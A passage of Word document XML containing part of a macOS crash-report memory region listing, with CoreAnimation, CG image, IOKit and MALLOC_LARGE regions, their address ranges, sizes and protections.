      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fe8f000-000000010fe97000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          000000010fea2000-000000010feae000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010feb1000-000000010feb9000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010febb000-000000010ff25000 [  424K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ff28000-000000010ff30000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ff31000-000000010ff3d000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ff42000-000000010ff88000 [  280K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ff95000-000000010ffeb000 [  344K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ffeb000-000000010fffa000 [   60K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fffa000-000000011000a000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110013000-0000000110023000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000110029000-0000000110055000 [  176K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110055000-0000000110059000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011005c000-000000011005f000 [   12K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110060000-0000000110064000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110066000-0000000110086000 [  128K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          000000011008e000-000000011009e000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001100a4000-00000001100b0000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001100b6000-00000001100c2000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001100c2000-00000001100c6000 [   16K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001100c8000-00000001100cc000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001100ce000-00000001100cf000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001100cf000-00000001100d7000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001100db000-00000001100eb000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001100f3000-000000011010f000 [  112K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110123000-000000011012b000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE           000000011012b000-000000011015b000 [  192K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011015b000-000000011016b000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000011016c000-000000011016d000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011016d000-000000011018a000 [  116K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110193000-00000001101a3000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          00000001101b7000-00000001101bf000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001101c2000-00000001101c6000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001101c7000-00000001101cf000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001101d7000-00000001101d9000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001101e4000-00000001101ec000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001101ed000-00000001101f5000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001101fd000-0000000110209000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000011020d000-000000011020e000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011021a000-0000000110222000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110226000-000000011022a000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000011022c000-0000000110230000 [   16K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110230000-0000000110238000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               0000000110238000-0000000110239000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110239000-000000011023d000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000011023d000-000000011023f000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">IOKit                  0000000110247000-0000000110248000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110248000-0000000110250000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               0000000110250000-0000000110251000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110259000-0000000110269000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110271000-0000000110275000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000011027d000-000000011027e000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110286000-000000011029e000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001102ba000-00000001102be000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001102c0000-00000001102cc000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001102ce000-00000001102cf000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001102cf000-00000001102d2000 [   12K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  00000001102dc000-00000001102dd000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001102dd000-00000001102f5000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 0000000110326000-0000000110327000 [    4K] rw-/rwx SM=ZER  cl_kernels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110336000-000000011033a000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreUI image data      000000011033b000-000000011034a000 [   60K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000011034c000-000000011034e000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011034e000-0000000110352000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011035a000-0000000110382000 [  160K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011038e000-000000011039a000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000011039a000-000000011039b000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011039b000-00000001103a3000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001103ab000-00000001103bb000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001103ca000-00000001103d2000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001103d5000-00000001103d9000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001103e6000-00000001103ee000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001103fa000-00000001103fe000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  0000000110405000-0000000110406000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Accelerate framework   0000000110406000-0000000110426000 [  128K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110426000-0000000110436000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          000000011044a000-000000011044e000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110451000-00000001104af000 [  376K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001104c6000-00000001104ce000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001104ce000-00000001104cf000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Image IO               00000001104d0000-00000001104d1000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_LARGE           00000001104d1000-00000001104e7000 [   88K] rw-/rwx SM=PRV  DefaultPurgeableMallocZone_0x10f9d0000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001104f3000-00000001104f7000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001104fa000-00000001104fe000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110501000-0000000110519000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011051b000-0000000110569000 [  312K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_LARGE           0000000110574000-00000001105a0000 [  176K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001105a0000-00000001105a9000 [   36K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001105b3000-00000001105f9000 [  280K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110615000-0000000110663000 [  312K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110671000-0000000110681000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          0000000110689000-00000001106a1000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001106ad000-00000001106cc000 [  124K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001106d4000-00000001106dc000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001106e0000-00000001106e2000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  00000001106e3000-00000001106e5000 [    8K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001106e7000-00000001106f7000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001106f8000-00000001106fb000 [   12K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001106fb000-0000000110703000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               0000000110703000-0000000110705000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110707000-000000011070f000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000011070f000-000000011072f000 [  128K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011073b000-0000000110743000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011074c000-0000000110764000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110766000-0000000110769000 [   12K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011078a000-000000011078e000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          0000000110791000-000000011079d000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001107ba000-00000001107c2000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001107cd000-00000001107cf000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001107d1000-00000001107d3000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001107d3000-0000000110811000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011081c000-0000000110914000 [  992K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011092c000-0000000110972000 [  280K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011097d000-00000001109bb000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE (empty)   00000001109d2000-00000001109f6000 [  144K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001109f6000-0000000110aea000 [  976K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
